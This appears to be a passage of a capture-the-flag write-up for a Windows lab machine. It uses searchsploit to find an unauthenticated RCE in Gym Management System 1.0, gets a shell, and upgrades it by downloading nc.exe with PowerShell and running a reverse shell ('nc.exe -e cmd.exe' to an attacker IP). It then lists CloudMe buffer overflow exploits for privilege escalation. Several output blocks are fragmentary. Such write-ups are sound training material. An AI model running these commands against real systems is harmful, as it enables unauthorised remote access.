```
| http-open-proxy: Potentially OPEN proxy.
```

7680 which is running Pando Media Public Distribution.

In the Contact directory we can see a note that says "Made using Gym Management Software 1.0".

A quick look at searchsploit reveals that there is an RCE vulnerability in this software.

```
WordPress Plugin WPGYM - SQL Injection                              | php/webapps/42801.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execution   | php/webapps/48506.py
Gym Management System 1.0 - Stored Cross Site Scripting             | php/webapps/48941.txt
Gym Management System 1.0 - Authentication Bypass                   | php/webapps/48940.txt
Gym Management System 1.0 - 'id' SQL Injection                      | php/webapps/48936.txt
Shellcodes: No Results
```

Gym Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.

## Initial Access

### Shell as shaun

```
┌──(root㉿kali)-
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
```

The shell I got was very unstable, so I wanted to upgrade it.

```
# Copy nc.exe to target machine
C:\xampp\htdocs\gym\upload> powershell -c (New-Object Net.WebClient).DownloadFile('', 'nc.exe')

# Start listener and execute nc.exe reverse shell
C:\xampp\htdocs\gym\upload> nc.exe -e cmd.exe 10.10.14.18 4444
connect to from (UNKNOWN) 50569
```

## Privilege Escalation

### Enumeration

After enumerating the machine I found that there were two ports listening on localhost.

```
Proto  Local Address          Foreign Address        State           PID
```

Looking at the processes running I can see that CloudMe is running on port 8888.

### Buffer overflow vulnerability

There was also an exe in Shaun's download folder telling me what version of CloudMe is running.

```
               2 Dir(s)  7,133,970,432 bytes free
```

```
CloudMe 1.11.2 - Buffer Overflow (PoC)                              | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)                     | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)                     | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)                    | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)             | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)      | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow                         | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow Egghunt                       | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)            | windows_x86-64/remote/46250.py
```

Looking at the searchsploit output we can see that there is a buffer overflow vulnerability in CloudMe 1.11.2.